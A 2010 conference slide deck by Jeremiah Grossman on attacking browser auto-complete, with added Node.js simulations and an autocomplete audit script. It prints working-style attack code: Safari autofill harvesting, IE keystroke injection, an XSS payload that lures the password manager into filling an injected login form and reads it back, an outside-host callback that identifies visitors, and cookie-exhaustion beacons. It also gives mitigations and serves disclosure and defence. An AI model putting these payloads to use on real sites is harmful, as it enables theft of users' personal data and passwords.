Date posted: 18-Nov-2014 | Category: Technology | Uploaded by: jeremiah-grossman
Breaking Browsers: Hacking Auto-Complete
Jeremiah Grossman, Founder & Chief Technology Officer
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: [email protected]

Special thanks to: Robert “RSnake” Hansen (SecTheory), Daniel Veditz (Mozilla), Microsoft Security Response Center, Mike Bailey (MAD Security), Chris Evans (Google)
© 2010 WhiteHat Security, Inc. | Page 2
me.
• WhiteHat Security Founder & Chief Technology Officer
• 2010 RSA Security Bloggers Award (Best Corporate Blog)
• InfoWorld's CTO Top 25 (2007)
• 5th most popular “Jeremiah” according to Google
• Brazilian Jiu-Jitsu Brown Belt
• Narcissistic Vulnerability Pimp
• Former Yahoo! information security officer
Web Security
Browser Security | Website Security (2,000+ websites)

Global Internet: 1.67 billion people
http://en.wikipedia.org/wiki/Global_Internet_usage
206 million websites
What the “bad guys” target...
• Largest market-share
• Exploiting features enabled by default
• Bonus for design flaws
Browser Version Market Share (July, 2010)
http://www.netmarketshare.com/browser-market-share.aspx?qprid=2
[Chart: browser version market share by number of people, for IE 8, IE 6, FF 3.5/3.6, IE 7, Chrome and Safari 4/5. Bar values as extracted: 491, 284, 351, 197, 103, 83, 36 and 307 million; the extraction does not preserve which bar each value belongs to.]
Security Features
Sandboxes, code security, memory protection, black-lists, green URL bars, anti-phishing, SSL warnings, etc.
I know where you’ve been... (on the way out)
On the way out in: FF 3.7 nightlies, Safari v5
http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

Classic CSS History Hack: style a link differently when visited than when unvisited, then read the difference back, either server-side through a background-image request or client-side through the computed style.

  a:visited#link { background: url('/capture.cgi?http://bank/'); }

  var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");

The fix: in the “visited” pseudo-class every style property except the color properties is ignored, and getComputedStyle lies, returning the “unvisited” link values.
CSRF Login-Detection
We often still know where you are logged-in, but that’s another discussion.
I want to know your name, who you work for, where you live, your email address, etc. Right at the moment you visit a website. Even if you’ve never been there before, let alone entered information.
Safari Address Book Autofill (enabled by default)

  <form>
  <input type="text" name="name">
  <input type="text" name="company">
  <input type="text" name="city">
  <input type="text" name="state">
  <input type="text" name="country">
  <input type="text" name="email">
  </form>
Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.
DEMO
Step 1) Dynamically create input fields with the pre-set attribute names.
Step 2) Cycle through the alphabet, initiating text events until a form value populates.
Step 3) Profit! -- Steal data with JavaScript.

  // synthesize a keystroke of one character (WebKit TextEvent)
  var event = document.createEvent('TextEvent');
  event.initTextEvent('textInput', 1, 1, null, char);

  // clear the field, fire the character at it, then read back whatever autofill added
  input.value = "";
  input.selectionStart = 0;
  input.selectionEnd = 0;
  input.focus();
  input.dispatchEvent(event);
  setTimeout(function() {
    if (input.value.length > 1) {
      // capture the value;
    }
  }, 500);

Safari v4 / v5
*transparency is even more fun!*
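The three steps above as a runnable Node.js simulation. This is an added example, not code from the talk: Safari is not driven here, a MockInput class emulates the observed behaviour (one typed character into a field named like an Address Book attribute completes the whole value), the address card is constructed sample data, and the alphabet is extended with digits so values that begin with a number are found too.

```javascript
// Added example: simulation of the Safari address-card autofill harvest.
// Constructed sample card (not a real Address Book entry).
const ADDRESS_BOOK = {
  name: 'Jane Doe',
  company: 'Example Corp',
  city: 'Portland',
  state: 'OR',
  country: 'United States',
  email: 'jane@example.com',
};

// Emulated Safari behaviour (assumption about the 2010 autofill logic): on a
// textInput event the field is completed with the card value whenever that
// value starts with the typed character (case-insensitive); otherwise the
// character is simply appended, as with ordinary typing.
class MockInput {
  constructor(name, card) {
    this.name = name;      // the pre-set attribute name, e.g. "email"
    this.card = card;
    this.value = '';
  }
  dispatchTextInput(ch) {
    const candidate = this.card[this.name];
    if (candidate && candidate.toLowerCase().startsWith(ch.toLowerCase())) {
      this.value = candidate;   // autofill fills in the complete value
    } else {
      this.value += ch;         // no autofill: only the typed character lands
    }
  }
}

const FIELD_NAMES = ['name', 'company', 'city', 'state', 'country', 'email'];
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789';

// Steps 1-3: create inputs with the pre-set names, fire one character at a
// time, and keep the first value that is longer than what was typed.
// makeInput is a factory so a real DOM input could be substituted in a page.
function harvest(card, fieldNames = FIELD_NAMES, alphabet = ALPHABET,
                 makeInput = (name) => new MockInput(name, card)) {
  const stolen = {};
  let probes = 0;
  for (const name of fieldNames) {
    const input = makeInput(name);          // Step 1
    for (const ch of alphabet) {            // Step 2
      probes++;
      input.value = '';
      input.dispatchTextInput(ch);
      if (input.value.length > 1) {         // more than the typed char: autofill hit
        stolen[name] = input.value;         // Step 3
        break;
      }
    }
  }
  return { stolen, probes };
}

console.log(JSON.stringify(harvest(ADDRESS_BOOK)));
```

Note the `length > 1` check copied from the slide: a one-character card value (a single-letter company name, say) can never be distinguished from the probe character itself, and a field absent from the card costs a full pass over the alphabet, which is why the probes are spaced out with a timer in the real browser version.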
What about stealing other auto-fill data, data that was previously entered?
Internet Explorer 8 = SAFE
AutoComplete: user-supplied form values are shared across different websites by attribute “name”. For example, an email address entered into a field on website A populates the autofill for the same field name on websites B, C, D, etc.
<input type="text" name="email">
DEMO - Down, Down, Enter

  // hit down arrow an incrementing number of times.
  // separate with time to allow the GUI to keep pace
  for (var i = 1; i <= downs; i++) {
    time += 30;                 // time padding
    keyStroke(this, 40, time);  // down button
  }
  time += 15;                   // time padding
  keyStroke(this, 13, time);    // enter button

  // initiate keystroke on a given object
  function keyStroke(obj, code, t) {
    // create new event and fire
    var e = document.createEventObject();
    e.keyCode = code;
    setTimeout(function() { obj.fireEvent("onkeydown", e); }, t);
  } // end keyStroke

Security Basis, and an Internet Explorer data stealer
http://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.html
Andrea Giammarchi, Ajaxian Staff
• Search terms
• Credit card numbers and CCVs
• Aliases
• Contact information
• Answers to secret questions
• Usernames
• Email addresses
• ...
AutoComplete is NOT enabled by default, but Internet Explorer asks the user whether they would like to enable the feature after they fill out a non-password form.
  <script>
  function fillAutoComp() {
    var num = Math.floor(Math.random()*1000000);
    document.getElementById('email').value = "Spoof-" + num;
    setTimeout("document.getElementById('me').submit(); fillAutoComp();", 2);
  }
  </script>

  <form id="me" method="post" action="/" target="my_iframe">
  <input type="text" name="email" id="email" value="" size=140>
  <input type="button" onclick="fillAutoComp()" value="Start">
  </form>
  <iframe name="my_iframe"></iframe>

Sometimes we can’t read auto-complete, but we can write to it (a lot)! Every submission into the hidden iframe stores another “Spoof-NNNNNN” value in the browser’s autocomplete list for the “email” field name.
https://bugzilla.mozilla.org/show_bug.cgi?id=578879
Have the email address, but need the password
Remember Password
Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.
  <form method="post" action="/">
  E-Mail: <input type="text" name="email"><br />
  Password: <input type="password" name="pass"><br />
  <input type="submit" value="Login">
  </form>

  function stealCreds() {
    var string = "E-Mail: " + document.getElementById("u").value;
    string += "\nPassword: " + document.getElementById("p").value;
    return string;
  }
  // inject a look-alike login form; the password manager fills it in
  document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');
  // give the browser a moment to autofill, then read the fields back
  setTimeout('alert(stealCreds())', 2000);
If a website with a saved password is vulnerable to XSS, the payload can dynamically create a login form, which triggers the browser’s password auto-complete feature. Since the payload runs on the same domain the saved password belongs to, the username / password can be stolen.
DEMO

Hidden Firefox Protection
about:config
signon.autofillForms
With signon.autofillForms set to false, Firefox no longer fills saved logins into forms automatically; the user has to pick the saved login from the field’s drop-down, so an injected form gets nothing until the user interacts with it.
Long-term problem, even when “fixed”
Mass distribute auto-complete code (ad network), cookie affected users with a unique ID, and setup a callback Web service.
DOMAIN: whoisthisperson (response of the callback Web service)
  var person = { name: 'name', email: 'email' };
  identify(person);

DOMAIN: website
  <script>function identify(person) { ... }</script>
  <script src="http://iknowyourname.com/?cb=identify"></script>
Need help deleting your cookies? The user’s way...
The Hackers Way - (Cookie Exhaustion)
Firefox: global 3,000 cookie max cap; 50 cookies can be set per hostname. Therefore, we need 1 domain with 60 subdomains.
https://bugzilla.mozilla.org/show_bug.cgi?id=321624
http://kuza55.blogspot.com/2008/02/understanding-cookie-security.html
http://www.nczonline.net/blog/2008/05/17/browser-cookie-restrictions/

  <script>
  // one image beacon per subdomain; each response sets 50 cookies
  for (var i = 1; i <= 60; i++) {
    img = new Image();
    img.src = "http://the" + i + ".cookiemonster.com/cgi-bin/cookie.pl";
  }
  </script>

Response from each cookie.pl:
  P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
  Set-Cookie: cNAME_1=_cValue_1;
  Set-Cookie: cNAME_2=_cValue_2;
  Set-Cookie: cNAME_3=_cValue_3;
  ...
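A Node.js model of the exhaustion attack, added here and not part of the talk. The browser is emulated by a CookieJar class with the two Firefox limits the slide gives (3,000 cookies globally, 50 per host); that the browser evicts its oldest cookie when the global cap is exceeded is an assumption about the eviction policy, and cookiemonster.com / cookie.pl are the slide’s placeholder names. The model also shows why the count is exactly 60: with 59 hosts the victim’s own cookie survives.

```javascript
// Added example: cookie exhaustion against a simulated browser cookie store.
const GLOBAL_CAP = 3000;   // Firefox global cap from the slide
const PER_HOST_CAP = 50;   // Firefox per-host cap from the slide

// Hosts needed to push every pre-existing cookie out: ceil(3000 / 50) = 60.
function hostsNeeded(globalCap = GLOBAL_CAP, perHostCap = PER_HOST_CAP) {
  return Math.ceil(globalCap / perHostCap);
}

// The attacker subdomains the image beacons point at.
function attackerHosts(domain = 'cookiemonster.com', n = hostsNeeded()) {
  return Array.from({ length: n }, (_, i) => `the${i + 1}.${domain}`);
}

// What each /cgi-bin/cookie.pl response sends back: a P3P header (so IE
// accepts third-party cookies) followed by perHostCap Set-Cookie headers.
function cookieResponseHeaders(hostIndex, perHostCap = PER_HOST_CAP) {
  const headers = [
    ['P3P', 'CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"'],
  ];
  for (let j = 1; j <= perHostCap; j++) {
    headers.push(['Set-Cookie', `cNAME_${hostIndex}_${j}=_cValue_${j}`]);
  }
  return headers;
}

// Minimal cookie store: per-host cap and global cap, oldest evicted first.
// (Assumption: real browsers also weigh last-access time; age is enough here.)
class CookieJar {
  constructor(globalCap = GLOBAL_CAP, perHostCap = PER_HOST_CAP) {
    this.globalCap = globalCap;
    this.perHostCap = perHostCap;
    this.cookies = [];   // insertion order doubles as age
  }
  set(host, name, value) {
    this.cookies = this.cookies.filter((c) => !(c.host === host && c.name === name));
    const sameHost = this.cookies.filter((c) => c.host === host);
    if (sameHost.length >= this.perHostCap) this.drop(sameHost[0]);   // oldest for this host
    this.cookies.push({ host, name, value });
    while (this.cookies.length > this.globalCap) this.cookies.shift(); // oldest overall
  }
  drop(c) { this.cookies.splice(this.cookies.indexOf(c), 1); }
  get(host, name) {
    const c = this.cookies.find((x) => x.host === host && x.name === name);
    return c ? c.value : undefined;
  }
  size() { return this.cookies.length; }
}

// Run the attack: load every beacon host's Set-Cookie headers into the jar.
function exhaust(jar, domain = 'cookiemonster.com', n = hostsNeeded()) {
  for (const [i, host] of attackerHosts(domain, n).entries()) {
    for (const [h, v] of cookieResponseHeaders(i + 1)) {
      if (h !== 'Set-Cookie') continue;
      const eq = v.indexOf('=');
      jar.set(host, v.slice(0, eq), v.slice(eq + 1));
    }
  }
  return jar;
}

// Stand-alone run: a victim session cookie before and after the attack.
const demo = new CookieJar();
demo.set('bank.example', 'session', 'abc');   // constructed victim cookie
exhaust(demo);
console.log(`jar size ${demo.size()}, victim session: ${demo.get('bank.example', 'session')}`);
```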
$300 dollar hack
What to do...
• Disable Auto-Complete in the Web browser
• Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.)
• NoScript (Firefox Extension), 1Password, etc.
• Website side: mark the form, or individual fields, so the browser neither stores nor offers values for them

  <form autocomplete="off"><input type="text" autocomplete="off" /></form>

Caveat: browsers treat autocomplete="off" as advisory. Current Chrome and Firefox ignore it for login fields so that their password managers still work, so it cannot be relied on to keep credentials out of the browser.
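A small audit for the website-side advice above, added here and not part of the talk. It scans HTML for form fields an auto-complete attack targets and reports any not covered by autocomplete="off" on the field or its enclosing form. It uses a regex over <form> and <input> start tags, which is adequate for server-rendered templates but is not a full HTML parser, and the list of sensitive field names is an assumption drawn from the attribute names used earlier in the talk.

```javascript
// Added example: report sensitive form fields lacking autocomplete="off".

// Field names worth flagging (assumption; extend for your own templates).
const SENSITIVE = /^(name|company|city|state|country|e-?mail|user(name)?|pass(word)?|card|cc|cvv|ccv|phone|address|zip|ssn)$/i;

// <form ...>, </form>, <input ...> start/end tags and their attribute text.
const TAG_RE = /<(\/?)(form|input)\b([^>]*)>/gi;
// name="v", name='v', name=v or a bare attribute.
const ATTR_RE = /([\w-]+)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Attribute text -> {lowercase name: lowercase value}.
function parseAttrs(text) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(text)) !== null) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4] ?? '').toLowerCase();
  }
  return attrs;
}

// Returns findings [{name, type, reason}] for fields that would still be
// stored/offered by a browser honouring autocomplete="off".
function auditAutocomplete(html) {
  const findings = [];
  let formOff = false;   // autocomplete="off" on the enclosing <form>
  let m;
  TAG_RE.lastIndex = 0;
  while ((m = TAG_RE.exec(html)) !== null) {
    const [, close, tag, rest] = m;
    const attrs = parseAttrs(rest);
    if (tag.toLowerCase() === 'form') {
      formOff = !close && attrs.autocomplete === 'off';   // </form> resets it
      continue;
    }
    if (close) continue;
    const type = attrs.type || 'text';
    if (type === 'hidden' || type === 'submit' || type === 'button') continue;
    const name = attrs.name || '';
    if (!SENSITIVE.test(name) && type !== 'password') continue;
    if (attrs.autocomplete !== 'off' && !formOff) {
      findings.push({ name, type, reason: 'no autocomplete="off" on field or form' });
    }
  }
  return findings;
}

// Stand-alone run against the six-field form from the Safari slide.
const SAMPLE = '<form><input type="text" name="name"><input type="text" name="company">'
  + '<input type="text" name="city"><input type="text" name="state">'
  + '<input type="text" name="country"><input type="text" name="email"></form>';
console.log(auditAutocomplete(SAMPLE));
```

The audit reflects the 2010 advice: it tells you which fields a browser that honours the attribute would still remember, not whether today’s password managers will fill a login form regardless.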
Jeremiah Grossman, Founder & Chief Technology Officer
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: [email protected]

Questions?